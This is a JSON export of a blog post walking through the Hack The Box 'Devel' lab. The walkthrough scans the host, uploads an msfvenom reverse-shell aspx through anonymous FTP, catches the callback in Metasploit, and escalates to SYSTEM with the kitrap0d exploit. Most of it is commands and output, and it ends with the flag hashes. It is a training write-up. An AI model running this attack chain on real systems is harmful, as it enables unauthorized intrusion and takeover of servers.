{"id":3722,"date":"2020-08-11T00:29:09","date_gmt":"2020-08-10T15:29:09","guid":{"rendered":"https:\/\/tech.akat.info\/?p=3722"},"modified":"2020-08-30T23:34:28","modified_gmt":"2020-08-30T14:34:28","slug":"hack-the-box-devel-walkthrough","status":"publish","type":"post","link":"https:\/\/tech.akat.info\/?p=3722","title":{"rendered":"Hack The Box &#8211; Devel &#8211; Walkthrough"},"content":{"rendered":"<h3>FTP and HTTP are exposed<\/h3>\n<pre class=\"brush: plain; title: ; notranslate\" title=\"\">\r\n# nmap -A -n -F -T5 devel.htb\r\nStarting Nmap 7.80 ( https:\/\/nmap.org ) at 2020-08-08 07:44 UTC\r\nNmap scan report for devel.htb (10.10.10.5)\r\nHost is up (0.044s latency).\r\nNot shown: 98 filtered ports\r\nPORT   STATE SERVICE VERSION\r\n21\/tcp open  ftp     Microsoft ftpd\r\n| ftp-anon: Anonymous FTP login allowed (FTP code 230)\r\n| 03-18-17  02:06AM       &lt;DIR&gt;          aspnet_client\r\n| 03-17-17  05:37PM                  689 iisstart.htm\r\n|_03-17-17  05:37PM               184946 welcome.png\r\n| ftp-syst:\r\n|_  SYST: Windows_NT\r\n80\/tcp open  http    Microsoft IIS httpd 7.5\r\n| http-methods:\r\n|_  Potentially risky methods: TRACE\r\n|_http-server-header: Microsoft-IIS\/7.5\r\n|_http-title: IIS7\r\n<\/pre>\n<h3>Accessing FTP shows that the document root is exposed<\/h3>\n<p><a href=\"https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-08_165142.png\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-08_165142-300x202.png\" alt=\"\" width=\"300\" height=\"202\" class=\"alignnone size-medium wp-image-3723\" srcset=\"https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-08_165142-300x202.png 300w, https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-08_165142-768x517.png 768w, 
https:\/\/tech.akat.info\/wp-content\/uploads\/2020\/08\/2020-08-08_165142.png 995w\" sizes=\"(max-width: 300px) 100vw, 300px\" \/><\/a><\/p>\n<h3>Place an aspx file that spawns a reverse shell<\/h3>\n<pre class=\"brush: plain; title: ; notranslate\" title=\"\">\r\n# msfvenom -p windows\/meterpreter\/reverse_tcp LHOST=10.10.14.13 LPORT=1234 -f aspx &gt; reverse.aspx\r\n&#x5B;-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload\r\n&#x5B;-] No arch selected, selecting arch: x86 from the payload\r\nNo encoder specified, outputting raw payload\r\nPayload size: 341 bytes\r\nFinal size of aspx file: 2788 bytes\r\n\r\n# ftp devel.htb\r\nConnected to devel.htb.\r\n220 Microsoft FTP Service\r\nName (devel.htb:root): anonymous\r\n331 Anonymous access allowed, send identity (e-mail name) as password.\r\nPassword:\r\n230 User logged in.\r\nRemote system type is Windows_NT.\r\nftp&gt; passive\r\nPassive mode on.\r\nftp&gt; put reverse.aspx\r\nlocal: reverse.aspx remote: reverse.aspx\r\n227 Entering Passive Mode (10,10,10,5,192,10).\r\n125 Data connection already open; Transfer starting.\r\n226 Transfer complete.\r\n2824 bytes sent in 0.00 secs (5.7918 MB\/s)\r\n<\/pre>\n<h3>The reverse shell connects back, but the user folder is not accessible<\/h3>\n<pre class=\"brush: plain; title: ; notranslate\" title=\"\">\r\n# msfconsole\r\nmsf5 &gt; use exploit\/multi\/handler\r\n&#x5B;*] Using configured payload generic\/shell_reverse_tcp\r\nmsf5 exploit(multi\/handler) &gt; set payload windows\/meterpreter\/reverse_tcp\r\npayload =&gt; windows\/meterpreter\/reverse_tcp\r\nmsf5 exploit(multi\/handler) &gt; set LHOST 10.10.14.13\r\nLHOST =&gt; 10.10.14.13\r\nmsf5 exploit(multi\/handler) &gt; set LPORT 1234\r\nLPORT =&gt; 1234\r\nmsf5 
exploit(multi\/handler) &gt; exploit\r\n&#x5B;*] Started reverse TCP handler on 0.0.0.0:1234\r\n&#x5B;*] Sending stage (176195 bytes) to 172.17.0.1\r\n&#x5B;*] Meterpreter session 1 opened (172.17.0.2:1234 -&gt; 172.17.0.1:37972) at 2020-08-10 14:42:31 +0000\r\n\r\nmeterpreter &gt; getuid\r\nServer username: IIS APPPOOL\\Web\r\nmeterpreter &gt; shell\r\nProcess 3828 created.\r\nChannel 1 created.\r\nMicrosoft Windows &#x5B;Version 6.1.7600]\r\nCopyright (c) 2009 Microsoft Corporation.  All rights reserved.\r\n\r\nc:\\windows\\system32\\inetsrv&gt;whoami\r\nwhoami\r\niis apppool\\web\r\nc:\\windows\\system32\\inetsrv&gt;cd c:\\Users\r\ncd c:\\Users\r\nc:\\Users&gt;cd babis\r\ncd babis\r\nAccess is denied.\r\n<\/pre>\n<h3>Search for vulnerabilities with local_exploit_suggester<\/h3>\n<pre class=\"brush: plain; title: ; notranslate\" title=\"\">\r\nmeterpreter &gt; bg\r\n&#x5B;*] Backgrounding session 1...\r\nmsf5 exploit(multi\/handler) &gt; use post\/multi\/recon\/local_exploit_suggester\r\nmsf5 post(multi\/recon\/local_exploit_suggester) &gt; set session 1\r\nsession =&gt; 1\r\nmsf5 post(multi\/recon\/local_exploit_suggester) &gt; exploit\r\n\r\n&#x5B;*] 10.10.10.5 - Collecting local exploits for x86\/windows...\r\n&#x5B;*] 10.10.10.5 - 34 exploit checks are being tried...\r\n&#x5B;+] 10.10.10.5 - exploit\/windows\/local\/bypassuac_eventvwr: The target appears to be vulnerable.\r\nnil versions are discouraged and will be deprecated in Rubygems 4\r\n&#x5B;+] 10.10.10.5 - exploit\/windows\/local\/ms10_015_kitrap0d: The service is running, but could not be validated.\r\n&#x5B;+] 10.10.10.5 - exploit\/windows\/local\/ms10_092_schelevator: The target appears to be vulnerable.\r\n&#x5B;+] 10.10.10.5 - exploit\/windows\/local\/ms13_053_schlamperei: The target appears to be vulnerable.\r\n&#x5B;+] 10.10.10.5 - exploit\/windows\/local\/ms13_081_track_popup_menu: The target appears to be vulnerable.\r\n&#x5B;+] 10.10.10.5 - 
exploit\/windows\/local\/ms14_058_track_popup_menu: The target appears to be vulnerable.\r\n&#x5B;+] 10.10.10.5 - exploit\/windows\/local\/ms15_004_tswbproxy: The service is running, but could not be validated.\r\n&#x5B;+] 10.10.10.5 - exploit\/windows\/local\/ms15_051_client_copy_image: The target appears to be vulnerable.\r\n&#x5B;+] 10.10.10.5 - exploit\/windows\/local\/ms16_016_webdav: The service is running, but could not be validated.\r\n&#x5B;+] 10.10.10.5 - exploit\/windows\/local\/ms16_075_reflection: The target appears to be vulnerable.\r\n&#x5B;+] 10.10.10.5 - exploit\/windows\/local\/ntusermndragover: The target appears to be vulnerable.\r\n&#x5B;+] 10.10.10.5 - exploit\/windows\/local\/ppr_flatten_rec: The target appears to be vulnerable.\r\n&#x5B;*] Post module execution completed\r\n<\/pre>\n<h3>Compromise the box with ms10_015_kitrap0d<\/h3>\n<pre class=\"brush: plain; title: ; notranslate\" title=\"\">\r\nmsf5 exploit(multi\/handler) &gt; use exploit\/windows\/local\/ms10_015_kitrap0d\r\n&#x5B;*] No payload configured, defaulting to windows\/meterpreter\/reverse_tcp\r\nmsf5 exploit(windows\/local\/ms10_015_kitrap0d) &gt; set LHOST 10.10.14.13\r\nLHOST =&gt; 10.10.14.13\r\nmsf5 exploit(windows\/local\/ms10_015_kitrap0d) &gt; set SESSION 1\r\nSESSION =&gt; 1\r\nmsf5 exploit(windows\/local\/ms10_015_kitrap0d) &gt; exploit\r\n\r\n&#x5B;-] Handler failed to bind to 10.10.14.13:4444:-  -\r\n&#x5B;*] Started reverse TCP handler on 0.0.0.0:4444\r\n&#x5B;*] Launching notepad to host the exploit...\r\n&#x5B;+] Process 4020 launched.\r\n&#x5B;*] Reflectively injecting the exploit DLL into 4020...\r\n&#x5B;*] Injecting exploit into 4020 ...\r\n&#x5B;*] Exploit injected. Injecting payload into 4020...\r\n&#x5B;*] Payload injected. 
Executing exploit...\r\n&#x5B;+] Exploit finished, wait for (hopefully privileged) payload execution to complete.\r\n&#x5B;*] Sending stage (176195 bytes) to 172.17.0.1\r\n&#x5B;*] Meterpreter session 3 opened (172.17.0.2:4444 -&gt; 172.17.0.1:42604) at 2020-08-10 15:19:11 +0000\r\n\r\nmeterpreter &gt; getuid\r\nServer username: NT AUTHORITY\\SYSTEM\r\nmeterpreter &gt; shell\r\nProcess 596 created.\r\nChannel 1 created.\r\nMicrosoft Windows &#x5B;Version 6.1.7600]\r\nCopyright (c) 2009 Microsoft Corporation.  All rights reserved.\r\n\r\nc:\\windows\\system32\\inetsrv&gt;cd c:\\Users\r\ncd c:\\Users\r\nc:\\Users&gt;type babis\\Desktop\\user.txt.txt\r\ntype babis\\Desktop\\user.txt.txt\r\n9ecdd6a3aedf24b41562fea70f4cb3e8\r\nc:\\Users&gt;type administrator\\Desktop\\root.txt\r\ntype administrator\\Desktop\\root.txt\r\nThe system cannot find the file specified.\r\n\r\nc:\\Users&gt;type administrator\\Desktop\\root.txt.txt\r\ntype administrator\\Desktop\\root.txt.txt\r\ne621a0b5041708797c4fc4728bc72b4b\r\n<\/pre>\n<h3>References<\/h3>\n<p><a href=\"https:\/\/paichan-it.hatenablog.com\/entry\/2020\/08\/07\/165736\">\u3010Hack The Box\u3011Devel Walkthrough<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>FTP and HTTP are exposed # nmap -A -n -F -T5 devel.htb Starting Nmap 7.80 ( https:\/\/nmap.org ) at 2020-08-08 07:44 UTC 
[&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_monsterinsights_skip_tracking":false,"_monsterinsights_sitenote_active":false,"_monsterinsights_sitenote_note":"","_monsterinsights_sitenote_category":0,"footnotes":""},"categories":[100,98],"tags":[],"_links":{"self":[{"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/posts\/3722"}],"collection":[{"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/tech.akat.info\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3722"}],"version-history":[{"count":2,"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/posts\/3722\/revisions"}],"predecessor-version":[{"id":3788,"href":"https:\/\/tech.akat.info\/index.php?rest_route=\/wp\/v2\/posts\/3722\/revisions\/3788"}],"wp:attachment":[{"href":"https:\/\/tech.akat.info\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3722"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/tech.akat.info\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3722"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/tech.akat.info\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3722"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}